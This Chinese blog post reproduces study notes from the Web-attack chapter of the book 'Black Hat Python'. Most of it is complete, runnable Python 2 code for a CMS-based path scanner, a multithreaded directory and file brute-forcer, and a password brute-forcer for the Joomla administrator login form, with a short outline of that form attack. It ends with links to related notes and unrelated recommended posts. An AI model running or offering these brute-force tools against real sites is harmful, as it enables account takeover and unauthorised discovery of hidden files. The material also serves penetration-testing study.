开源Web应用目录扫描器

这里的前提是Web服务器使用的是开源CMS来建站的,而且自己也下载了一套相应的开源代码,感觉意义并不大

#!/usr/bin/python

#coding=utf-8

import Queue

import threading

import os

import urllib2

threads = 10

target = "http://10.10.10.144/dunling"

directory = "/dunling"

filters = [".jpg",".gif",".png",".css"]

os.chdir(directory)

web_paths = Queue.Queue()

for r,d,f in os.walk("."):

    for files in f:

        remote_path = "%s/%s"%(r,files)

        if remote_path.startswith("."):

            remote_path = remote_path[1:]

        if os.path.splitext(files)[1] not in filters:

            web_paths.put(remote_path)

def test_remote():

    while not web_paths.empty():

        path = web_paths.get()

        url = "%s%s"%(target,path)

        request = urllib2.Request(url)

        try:

            response = urllib2.urlopen(request)

            content = response.read()

            print "[%d] => %s"%(response.code,path)

            response.close()

        except urllib2.HTTPError as error:

            # print "Failed %s"%error.code

            pass

for i in range(threads):

    print "Spawning thread : %d"%i

    t = threading.Thread(target=test_remote)

    t.start()

暴力破解目录和文件位置

#!/usr/bin/python

#coding=utf-8

import urllib2

import threading

import Queue

import urllib

threads = 50

target_url = "http://testphp.vulnweb.com"

wordlist_file = "/tmp/all.txt" # from SVNDigger

resume = None

user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0"

def build_wordlist(wordlist_file):

    #读入字典文件

    fd = open(wordlist_file,"rb")

    raw_words = fd.readlines()

    fd.close()

    found_resume = False

    words = Queue.Queue()

    for word in raw_words:

        word = word.rstrip()

        if resume is not None:

            if found_resume:

                words.put(word)

            else:

                if word == resume:

                    found_resume = True

                    print "Resuming wordlist from: %s"%resume

        else:

            words.put(word)

    return words

def dir_bruter(word_queue,extensions=None):

    while not word_queue.empty():

        attempt = word_queue.get()

        attempt_list = []

        #检测是否有文件扩展名,若没有则就是要暴力破解的路径

        if "." not in attempt:

            attempt_list.append("/%s/"%attempt)

        else:

            attempt_list.append("/%s"%attempt)

        #如果我们想暴破扩展

        if extensions:

            for extension in extensions:

                attempt_list.append("/%s%s"%(attempt,extension))

        #迭代我们要尝试的文件列表

        for brute in attempt_list:

            url = "%s%s"%(target_url,urllib.quote(brute))

            try:

                headers = {}

                headers["User-Agent"] = user_agent

                r = urllib2.Request(url,headers=headers)

                response = urllib2.urlopen(r)

                if len(response.read()):

                    print "[%d] => %s"%(response.code,url)

            except urllib2.URLError, e:

                if hasattr(e,'code') and e.code != 404:

                    print "!!! %d => %s"%(e.code,url)

                pass

word_queue = build_wordlist(wordlist_file)

extensions = [".php",".bak",".orig",".inc"]

for i in range(threads):

    t = threading.Thread(target=dir_bruter,args=(word_queue,extensions,))

    t.start()

暴力破解HTML表格认证

1、检索登录页面,接受所有返回的cookies值;

2、从HTML中获取所有表单元素;

3、在你的字典中设置需要猜测的用户名和密码;

4、发送HTTP POST数据包到登录处理脚本,数据包含所有的HTML表单文件和存储的cookies值;

5、测试是否能登录成功。

#!/usr/bin/python

#coding=utf-8

import urllib2

import urllib

import cookielib

import threading

import sys

import Queue

from HTMLParser import HTMLParser

#简要设置

user_thread = 10

username = "admin"

wordlist_file = "/tmp/passwd.txt"

resume = None

#特定目标设置

target_url = "http://10.10.10.144/Joomla/administrator/index.php"

target_post = "http://10.10.10.144/Joomla/administrator/index.php"

username_field = "username"

password_field = "passwd"

success_check = "Administration - Control Panel"

class Bruter(object):

    """docstring for Bruter"""

    def __init__(self, username, words):

        self.username = username

        self.password_q = words

        self.found = False

        print "Finished setting up for: %s"%username

    def run_bruteforce(self):

        for i in range(user_thread):

            t = threading.Thread(target=self.web_bruter)

            t.start()

    def web_bruter(self):

        while not self.password_q.empty() and not self.found:

            brute = self.password_q.get().rstrip()

            jar = cookielib.FileCookieJar("cookies")

            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(jar))

            response = opener.open(target_url)

            page = response.read()

            print "Trying: %s : %s (%d left)"%(self.username,brute,self.password_q.qsize())

            #解析隐藏区域

            parser = BruteParser()

            parser.feed(page)

            post_tags = parser.tag_results

            #添加我们的用户名和密码区域

            post_tags[username_field] = self.username

            post_tags[password_field] = brute

            login_data = urllib.urlencode(post_tags)

            login_response = opener.open(target_post,login_data)

            login_result = login_response.read()

            if success_check in login_result:

                self.found = True

                print "[*] Bruteforce successful. "

                print "[*] Username: %s"%self.username

                print "[*] Password: %s"%brute

                print "[*] Waiting for other threads to exit ... "

class BruteParser(HTMLParser):

    """docstring for BruteParser"""

    def __init__(self):

        HTMLParser.__init__(self)

        self.tag_results = {}

    def handle_starttag(self,tag,attrs):

        if tag == "input":

            tag_name = None

            tag_value = None

            for name,value in attrs:

                if name == "name":

                    tag_name = value

                if name == "value":

                    tag_value = value

                if tag_name is not None:

                    self.tag_results[tag_name] = value

def build_wordlist(wordlist_file):

    fd = open(wordlist_file,"rb")

    raw_words = fd.readlines()

    fd.close()

    found_resume = False

    words = Queue.Queue()

    for word in raw_words:

        word = word.rstrip()

        if resume is not None:

            if found_resume:

                words.put(word)

            else:

                if word == resume:

                    found_resume = True

                    print "Resuming wordlist from: %s"%resume

        else:

            words.put(word)

    return words

words = build_wordlist(wordlist_file)

brute_obj = Bruter(username,words)

brute_obj.run_bruteforce()

《Python黑帽子:黑客与渗透测试编程之道》 Web攻击的更多相关文章

  1. python黑帽子-黑客与渗透测试编程之道(源代码)

    链接: https://pan.baidu.com/s/1i5BnB5V   密码: ak9t

  2. 读书笔记 ~ Python黑帽子 黑客与渗透测试编程之道

    Python黑帽子  黑客与渗透测试编程之道   <<< 持续更新中>>> 第一章: 设置python 环境 1.python软件包管理工具安装 root@star ...

  3. 2017-2018-2 20179204 PYTHON黑帽子 黑客与渗透测试编程之道

    python代码见码云:20179204_gege 参考博客Python黑帽子--黑客与渗透测试编程之道.关于<Python黑帽子:黑客与渗透测试编程之道>的学习笔记 第2章 网络基础 t ...

  4. 《Python黑帽子:黑客与渗透测试编程之道》 扩展Burp代理

    下载jython,在Burpsuite的扩展中配置jython路径: Burp模糊测试: #!/usr/bin/python #coding=utf-8 # 导入三个类,其中IBurpExtender ...

  5. 《Python黑帽子:黑客与渗透测试编程之道》 Scapy:网络的掌控者

    窃取email认证: 测试代码: #!/usr/bin/python #coding=utf-8 from scapy.all import * #数据包回调函数 def packet_callbac ...

  6. 《Python黑帽子:黑客与渗透测试编程之道》 网络基础

    TCP客户端: 示例中socket对象有两个参数,AF_INET参数表明使用IPv4地址或主机名 SOCK_STREAM参数表示是一个TCP客户端.访问的URL是百度. #coding=utf-8 i ...

  7. 《Python黑帽子:黑客与渗透测试编程之道》 玩转浏览器

    基于浏览器的中间人攻击: #coding=utf-8 import win32com.client import time import urlparse import urllib data_rec ...

  8. 《Python黑帽子:黑客与渗透测试编程之道》 Windows下木马的常用功能

    有趣的键盘记录: 安装pyHook: http://nchc.dl.sourceforge.net/project/pyhook/pyhook/1.5.1/pyHook-1.5.1.win32-py2 ...

  9. 《Python黑帽子:黑客与渗透测试编程之道》 基于GitHub的命令和控制

    GitHub账号设置: 这部分按书上来敲命令即可,当然首先要注册一个GitHub账号还有之前安装的GitHub API库(pip install github3.py),这里就只列一下命令吧: mkd ...

随机推荐

  1. SqlDataHelper

    using System;using System.Data;using System.Configuration;using System.Linq;using System.Web;using S ...

  2. DB2频繁出现死锁,常用解决问题的命令

    --DB2频繁出现死锁,常用解决问题的命令db2 get snapshot for locks on sampledb2 get db cfg for sampledb2 update db cfg ...

  3. Ubuntu12.04下搭建Java环境

    1.认识需要配置的环境变量 1). PATH: 作用是指定命令搜索路径,打开/etc/environment可以看到PATH变量的值,该变量包含了一系列的路径.那些路径都是一些经常使用的系统命令的目录 ...

  4. OSGi 系列(十三)之 Configuration Admin Service

    OSGi 系列(十三)之 Configuration Admin Service OSGi 的 CM 就是 Configuration Admin Service,是用于管理 Bundle 属性.并在 ...

  5. 【JAVA】通过HttpURLConnection 上传和下载文件(二)

    HttpURLConnection文件上传 HttpURLConnection采用模拟浏览器上传的数据格式,上传给服务器 上传代码如下: package com.util; import java.i ...

  6. Number.isInteger在IE中报错的解决方法

    if (!Number.isInteger) { Number.isInteger = function(num) { return typeof num == "number" ...

  7. 第一章:模型层model layer

    1.模型和字段 (1)基本的原则如下: 每个模型在Django中的存在形式为一个Python类 每个模型都是django.db.models.Model的子类 模型的每个字段(属性)代表数据表的某一列 ...

  8. nvarchar,varchar 区别

        char    char是定长的,也就是当你输入的字符小于你指定的数目时,char(8),你输入的字符小于8时,它会再后面补空值.当你输入的字符大于指定的数时,它会截取超出的字符.   nva ...

  9. cuDNN

    https://developer.nvidia.com/developer-program https://developer.nvidia.com/cudnn cuda和cuDNN的关系 http ...

  10. Linux应用程序中使用math库报undefined reference to `sin'等

    出现该问题是因为在Linux中,sin,sqrt等函数是在libm.so库文件中,并非在math.h中. 解决办法:在Ubuntu的gcc编译环境下,直接使用lm参数即可,例如gcc -o Gen G ...